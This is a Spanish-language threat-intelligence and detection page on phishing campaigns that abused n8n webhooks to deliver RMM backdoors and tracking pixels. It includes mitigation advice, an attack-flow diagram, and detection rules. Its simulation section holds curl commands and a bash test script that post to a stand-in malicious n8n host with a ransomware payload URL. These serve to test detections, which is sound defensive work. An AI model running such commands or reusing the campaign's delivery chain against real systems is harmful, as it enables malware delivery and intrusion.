Los actores de amenazas explotan n8n para automatizar ataques impulsados por IA
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los actores de amenazas están explotando la plataforma de automatización de código bajo n8n para distribuir cargas maliciosas y perfilar a los destinatarios de correo electrónico. Al incrustar URL de webhook dañinas en mensajes de phishing, pueden entregar archivos ejecutables o instaladores MSI que despliegan herramientas de acceso remoto en los sistemas de las víctimas. La actividad también incluye el uso de píxeles de seguimiento invisibles que recolectan información de la víctima tan pronto como se abre el correo. Esta campaña resalta cómo un servicio legítimo de automatización de flujos de trabajo puede ser reutilizado para la entrega de malware sin requerir credenciales robadas.
Investigación
Cisco Talos analizó una serie de campañas de phishing observadas entre octubre de 2025 y marzo de 2026 que se basaron en URL de webhook de n8n incrustadas en mensajes de correo electrónico. Los cebos emplearon enlaces falsos de OneDrive que primero mostraban un aviso CAPTCHA antes de servir un .exe o archivo MSI malicioso. Una vez ejecutados, las cargas instalaban versiones modificadas de las herramientas RMM de Datto o ITarian y creaban tareas programadas para mantener la persistencia. Talos también encontró actividad de obtención de huellas digitales a través de etiquetas de imagen que llamaban a URL de webhook n8n que contenían identificadores específicos de la víctima.
Mitigación
Las organizaciones deben monitorizar el tráfico saliente inusual hacia dominios relacionados con n8n desde sistemas que normalmente no utilizarían servicios de automatización e inspeccionar patrones sospechosos de URL de webhook. Las URL que resuelven a subdominios desconocidos de n8n.cloud deben ser bloqueadas o detonadas en un entorno seguro antes de permitir el acceso al usuario. Los controles de seguridad del correo electrónico también deben ajustarse para detectar contenido HTML malicioso, flujos de CAPTCHA falsos y píxeles de seguimiento ocultos. Los IOC relevantes, incluidas las URL de webhook y los hashes de archivos maliciosos, deben compartirse con plataformas de inteligencia de amenazas y defensores internos.
Respuesta
Los equipos de seguridad deben alertar sobre la presencia de URL de webhook de n8n en el contenido del correo electrónico o en la telemetría de la red y aislar cualquier anfitrión afectado tan pronto como se confirme actividad sospechosa. Cualquier herramienta RMM instalada y las tareas programadas relacionadas deben ser eliminadas, seguidas de un análisis forense para descubrir persistencias adicionales o cargas futuras. Las políticas de firewall y proxy deben actualizarse para restringir el acceso a terminales n8n no autorizados. Las organizaciones también deben completar un proceso completo de compartir IOC a lo largo de los equipos internos y socios externos de confianza.
"graph TB %% Definiciones de clase classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodos action_phishing["<b>Acción</b> – <b>T1566 Phishing</b>: Los actores de amenazas envían correos electrónicos maliciosos que contienen URL de webhook de n8n para atraer a las víctimas.<br/><b>Descripción</b>: Intentos de phishing para entregar contenido malicioso a través del correo electrónico."] class action_phishing action tool_webhook["<b>Herramienta</b> – <b>Nombre</b>: Webhook de n8n<br/><b>Descripción</b>: Punto final web personalizado utilizado para entregar cargas."] class tool_webhook tool action_user_execution["<b>Acción</b> – <b>T1204.001 Ejecución del Usuario: Enlace Malicioso</b>: La víctima hace clic en el enlace del webhook, lo que provoca que el navegador solicite la URL.<br/><b>Descripción</b>: El usuario interactúa con contenido malicioso."] class action_user_execution action action_exfil_webhook1["<b>Acción</b> – <b>T1567.004 Exfiltración a través de Webhook</b>: El webhook devuelve una página HTML maliciosa con un CAPTCHA y transmite una carga (EXE o MSI) mientras sirve píxeles de seguimiento.<br/><b>Descripción</b>: Utiliza un servicio web para entregar y exfiltrar datos."] class action_exfil_webhook1 action malware_payload_exe["<b>Malware</b> – <b>Nombre</b>: Carga EXE/MSI<br/><b>Descripción</b>: Ejecutable que ejecuta PowerShell para instalar una herramienta RMM modificada."] class malware_payload_exe malware action_powershell["<b>Acción</b> – <b>T1059.001 PowerShell</b>: El ejecutable descargado ejecuta comandos de PowerShell para configurar e instalar la herramienta RMM modificada.<br/><b>Descripción</b>: Intérprete de comandos y secuencias de comandos."] class action_powershell action malware_rmm["<b>Malware</b> – <b>Nombre</b>: Backdoor RMM Modificado<br/><b>Descripción</b>: Herramienta de monitoreo y gestión remota utilizada para persistencia."] class malware_rmm malware action_service_execution["<b>Acción</b> – <b>T1569.002 Ejecución de Servicio</b>: La herramienta RMM se instala como un servicio de Windows para persistencia.<br/><b>Descripción</b>: Se ejecuta a través de un servicio de sistema."] class action_service_execution action action_scheduled_task["<b>Acción</b> – <b>T1053 Tarea/Job Programado</b>: Se crea una tarea programada para asegurar que la herramienta RMM se ejecute persistentemente.<br/><b>Descripción</b>: Asegura la ejecución recurrente."] class action_scheduled_task action action_msi_execution["<b>Acción</b> – <b>T1218.007 Msiexec</b>: El MSI malicioso se ejecuta a través de msiexec para desplegar el backdoor RMM.<br/><b>Descripción</b>: Ejecución de proxy binario del sistema."] class action_msi_execution action action_exfil_webhook2["<b>Acción</b> – <b>T1567.004 Exfiltración a través de Webhook</b>: Un píxel de seguimiento invisible carga el webhook para capturar eventos de apertura de correo electrónico e información del dispositivo para reconocimiento."] class action_exfil_webhook2 action %% Conexiones action_phishing –>|entrega| tool_webhook tool_webhook –>|activa| action_user_execution action_user_execution –>|lleva a| action_exfil_webhook1 action_exfil_webhook1 –>|entrega| malware_payload_exe malware_payload_exe –>|ejecuta| action_powershell action_powershell –>|instala| malware_rmm malware_rmm –>|persiste a través de| action_service_execution action_service_execution –>|crea| action_scheduled_task action_scheduled_task –>|soporta| action_msi_execution action_msi_execution –>|despliega| malware_rmm malware_rmm –>|comunica a través de| action_exfil_webhook2 "
Flujo de Ataque
Detecciones
Posible archivo malicioso con doble extensión (vía creación de proceso)
Ver
Intento de ejecución de Windows ITarian Endpoint Manager (vía creación de proceso)
Ver
Software alternativo de acceso remoto/gestión (vía creación de proceso)
Ver
Posible infiltración/exfiltración de datos/C2 a través de servicios/herramientas de terceros (vía proxy)
Ver
Posible infiltración/exfiltración de datos/C2 a través de servicios/herramientas de terceros (vía dns)
Ver
IOC (HashSha256) para detectar: El n8n n8mare: Cómo los actores de amenazas están abusando de la automatización de flujos de trabajo de IA
Ver
Detectar solicitudes HTTP GET a URLs de webhook de n8n [Proxy]
Ver
Detección de abuso de webhook de n8n para entrega de malware y obtención de huellas digitales de dispositivo [Servidor Web]
Ver
Ejecución de simulación
Prerequisito: El chequeo de pre-vuelo de telemetría y línea base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y pretenden generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa y Comandos de Ataque:
Un atacante compra un dominio de corta duración que apunta a
n8n.cloud/webhook. Crean un flujo de trabajo malicioso en n8n que, una vez activado, sirve una carga de ransomware. El correo de phishing contiene un enlace a una página de destino con un desafío CAPTCHA. La víctima resuelve el CAPTCHA, que el JavaScript del atacante reenvía como el valorCAPTCHA=solved123en el cuerpo HTTP de una solicitud POST al webhook. El webhook responde con un descargador de PowerShell que ejecuta la carga. Este flujo genera una solicitud HTTP cuya URL contienen8n.cloud/webhookand cuyo cuerpo contiene la cadenaCAPTCHA, coincidiendo perfectamente con la regla Sigma.# Paso 1 – La víctima completa el CAPTCHA (simulado) CAPTCHA_TOKEN="solved123" # Paso 2 – Elaborar el POST malicioso que imita la acción de la víctima curl -X POST "https://my.malicious-n8n.cloud/webhook/malicious-workflow" -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" --data-urlencode "payload_url=https://malicious.example.com/ransomware.exe" -
Script de Prueba de Regresión:
#!/usr/bin/env bash set -euo pipefail # Variables – ajustar a su entorno de prueba WEBHOOK_HOST="my.malicious-n8n.cloud" WEBHOOK_PATH="/webhook/malicious-workflow" CAPTCHA_TOKEN="solved123" PAYLOAD_URL="https://malicious.example.com/ransomware.exe" echo "[*] Simulando abuso de webhook n8n impulsado por CAPTCHA..." curl -s -o /dev/null -w "%{http_code}n" -X POST "https://${WEBHOOK_HOST}${WEBHOOK_PATH}" -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" --data-urlencode "payload_url=${PAYLOAD_URL}" echo "[+] Simulación completa. Verificar detección en SIEM." -
Comandos de Limpieza:
# Si se creó un webhook real para pruebas, elimínelo a través de la interfaz de usuario o la API de n8n. # Ejemplo de llamada API (reemplazar API_KEY y WORKFLOW_ID): curl -X DELETE "https://my.malicious-n8n.cloud/webhook/malicious-workflow" -H "Authorization: Bearer API_KEY" # Eliminar cualquier archivo temporal (ninguno creado en este script) echo "[+] Limpieza terminada."